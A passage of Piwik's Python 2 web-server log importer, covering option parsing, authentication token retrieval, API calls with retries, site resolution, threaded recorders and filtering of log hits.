"the field in a custom variable. For example, specifying --w3c-field-regex=sc-win32-status=(?P<win32_status>\\S+) "
"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Piwik configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Piwik."
)
return option_parser
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in type(format).fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.piwik_url:
fatal_error('no URL given for Piwik')
if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')):
self.options.piwik_url = 'http://' + self.options.piwik_url
logging.debug('Piwik URL is: %s', self.options.piwik_url)
if not self.options.piwik_token_auth:
try:
self.options.piwik_token_auth = self._get_token_auth()
except Piwik.Error, e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth)
if self.options.recorders < 1:
self.options.recorders = 1
if self.options.download_extensions:
self.options.download_extensions = set(self.options.download_extensions.split(','))
else:
self.options.download_extensions = DOWNLOAD_EXTENSIONS
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Piwik.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
piwik_login = self.options.login
piwik_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password)
try:
api_result = piwik.call_api('UsersManager.getTokenAuth',
userLogin=piwik_login,
md5Password=piwik_password,
_token_auth='',
_url=self.options.piwik_url,
)
except urllib2.URLError, e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.piwik_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Simple integers cannot be used by multithreaded programs. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
def __init__(self):
self.time_start = None
self.time_stop = None
self.piwik_sites = set() # sites ID
self.piwik_sites_created = [] # (hostname, site ID)
self.piwik_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# Do not match the regexp.
self.count_lines_invalid = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP erors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
def print_summary(self):
print '''
Logs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Piwik, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.piwik_sites),
'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)),
'total_sites_created': len(self.piwik_sites_created),
'sites_created': self._indent_text(
['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created],
level=3,
),
'total_sites_ignored': len(self.piwik_sites_ignored),
'sites_ignored': self._indent_text(
self.piwik_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Piwik, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Piwik rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Piwik with the URL set to this hostname
''' if self.piwik_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.piwik_url
}
##
## The monitor is a thread that prints a short summary each second.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print '%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
)
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class Piwik(object):
"""
Make requests to Piwik.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Piwik site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.piwik_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP do not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
headers['User-Agent'] = 'Piwik/LogImport'
request = urllib2.Request(url + path, data, headers)
opener = urllib2.build_opener(Piwik.RedirectHandlerWithLogging())
response = opener.open(request, timeout = config.options.request_timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Piwik API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.piwik_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.)
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
res = Piwik._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Piwik returned an invalid response: ' + res)
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Try to make requests to Piwik at most PIWIK_FAILURE_MAX_RETRY times.
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout), e:
logging.info('Error when connecting to Piwik: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
errors += 1
if errors == config.options.max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Piwik.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(config.options.delay_after_failure)
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Piwik site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = piwik.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.piwik_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Piwik API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = piwik.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
main_url = 'http://' + hit.host
return piwik.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=main_url,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Piwik site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Piwik site for hostname %s', hit.host)
result = piwik.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Piwik site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.piwik_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.piwik_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If parsed site ID found in the _cache['sites'] return site ID and main_url,
otherwise return (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.piwik_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# We only consider requests with piwik.php which don't need host to be imported
return self._resolve_when_replay_tracking(hit)
else:
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Piwik site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Piwik using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
hits = self.queue.get()
if len(hits) > 0:
try:
self._record_hits(hits)
except Piwik.Error, e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Piwik.Error, e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_piwik(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Piwik site.
if config.options.replay_tracking:
stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.piwik_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url if it's a path
url = (main_url if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_piwik(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent request to be force recorded when option replay-tracking
args['rec'] = '0'
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return args
def _record_hits(self, hits):
"""
Inserts several hits into Piwik.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.piwik_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
piwik.call(
'/piwik.php', args={},
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
except Piwik.Error, e:
# if the server returned 400 code, BulkTracking may not be enabled
if e.code == 400:
fatal_error("Server returned status 400 (Bad Request).\nIs the BulkTracking plugin disabled?")
raise
stats.count_lines_recorded.advance(len(hits))
def _is_json(self, result):
try:
json.loads(result)
return True
except ValueError, e:
return False
def _on_tracking_failure(self, response, data):
"""
Removes the successfully tracked hits from the request payload so
they are not logged twice.
"""
try:
response = json.loads(response)
except:
# the response should be in JSON, but in case it can't be parsed just try another attempt
logging.debug("cannot parse tracker response, should be valid JSON")
return response
# remove the successfully tracked hits from payload
tracked = response['tracked']
data['requests'] = data['requests'][tracked:]
return response['message']
class Hit(object):
"""
It's a simple container.
"""
def __init__(self, **kwargs):
for key, value in kwargs.iteritems():
setattr(self, key, value)
super(Hit, self).__init__()
if config.options.force_lowercase_path:
self.full_path = self.full_path.lower()
def get_visitor_id_hash(self):
visitor_id = self.ip
if config.options.replay_tracking:
for param_name_to_use in ['uid', 'cid', '_id', 'cip']:
if param_name_to_use in self.args:
visitor_id = self.args[param_name_to_use]
break
return abs(hash(visitor_id))
def add_page_custom_var(self, key, value):
"""
Adds a page custom variable to this Hit.
"""
self._add_custom_var(key, value, 'cvar')
def add_visit_custom_var(self, key, value):
"""
Adds a visit custom variable to this Hit.
"""
self._add_custom_var(key, value, '_cvar')
def _add_custom_var(self, key, value, api_arg_name):
if api_arg_name not in self.args:
self.args[api_arg_name] = {}
if isinstance(self.args[api_arg_name], basestring):
logging.debug("Ignoring custom %s variable addition [ %s = %s ], custom var already set to string." % (api_arg_name, key, value))
return
index = len(self.args[api_arg_name]) + 1
self.args[api_arg_name][index] = [key, value]
class Parser(object):
"""
The Parser parses the lines in a specified file and inserts them into
a Queue.
"""
def __init__(self):
self.check_methods = [method for name, method
in inspect.getmembers(self, predicate=inspect.ismethod)
if name.startswith('check_')]
## All check_* methods are called for each hit and must return True if the
## hit can be imported, False otherwise.
def check_hostname(self, hit):
# Check against config.hostnames.
if not hasattr(hit, 'host') or not config.options.hostnames:
return True
# Accept the hostname only if it matches one pattern in the list.
result = any(
fnmatch.fnmatch(hit.host, pattern)
for pattern in config.options.hostnames
)
if not result:
stats.count_lines_hostname_skipped.increment()
return result
def check_static(self, hit):
if hit.extension in STATIC_EXTENSIONS:
if config.options.enable_static:
hit.is_download = True
return True
else:
stats.count_lines_static.increment()
return False
return True
def check_download(self, hit):
if hit.extension in config.options.download_extensions:
stats.count_lines_downloads.increment()
hit.is_download = True
return True
# the file is not in the white-listed downloads
# if it's a know download file, we shall skip it
elif hit.extension in DOWNLOAD_EXTENSIONS:
stats.count_lines_skipped_downloads.increment()
return False
return True
def check_user_agent(self, hit):
user_agent = hit.user_agent.lower()
for s in itertools.chain(EXCLUDED_USER_AGENTS, config.options.excluded_useragents):
if s in user_agent:
if config.options.enable_bots:
hit.is_robot = True
return True
else:
stats.count_lines_skipped_user_agent.increment()
return False
return True
def check_http_error(self, hit):
if hit.status[0] in ('4', '5'):
if config.options.replay_tracking:
# process error logs for replay tracking, since we don't care if piwik error-ed the first time
return True
elif config.options.enable_http_errors:
hit.is_error = True
return True
else:
stats.count_lines_skipped_http_errors.increment()
return False
return True
def check_http_redirect(self, hit):
if hit.status[0] == '3' and hit.status != '304':
if config.options.enable_http_redirects:
hit.is_redirect = True
return True
else:
stats.count_lines_skipped_http_redirects.increment()
return False
return True
def check_path(self, hit):
for excluded_path in config.options.excluded_paths:
if fnmatch.fnmatch(hit.path, excluded_path):
return False
# By default, all paths are included.
if config.options.included_paths:
for included_path in config.options.included_paths:
if fnmatch.fnmatch(hit.path, included_path):
return True
return False
return True
@staticmethod
def check_format(lineOrFile):
format = False
format_groups = 0
for name, candidate_format in FORMATS.iteritems():
logging.debug("Check format %s", name)
match = None
try:
if isinstance(lineOrFile, basestring):
match = candidate_format.check_format_line(lineOrFile)
else:
match = candidate_format.check_format(lineOrFile)
except Exception, e:
logging.debug('Error in format checking: %s', traceback.format_exc())
pass
if match:
logging.debug('Format %s matches', name)
# compare format groups if this *BaseFormat has groups() method
try:
# if there's more info in this match, use this format
match_groups = len(match.groups())
logging.debug('Format match contains %d groups' % match_groups)
if format_groups < match_groups:
format = candidate_format
format_groups = match_groups
except AttributeError:
format = candidate_format
else:
logging.debug('Format %s does not match', name)
# if the format is W3cExtendedFormat, check if the logs are from IIS and if so, issue a warning if the
# --w3c-time-taken-milli option isn't set
if isinstance(format, W3cExtendedFormat):
format.check_for_iis_option()
return format
@staticmethod
def detect_format(file):
"""
Return the best matching format for this file, or None if none was found.
"""
logging.debug('Detecting the log format')
format = False
# check the format using the file (for formats like the W3cExtendedFormat one)
format = Parser.check_format(file)
# check the format using the first N lines (to avoid irregular ones)
lineno = 0
limit = 100000
while not format and lineno < limit:
line = file.readline()
if not line: # if at eof, don't keep looping
break
lineno = lineno + 1
logging.debug("Detecting format against line %i" % lineno)
format = Parser.check_format(line)
try:
file.seek(0)
except IOError:
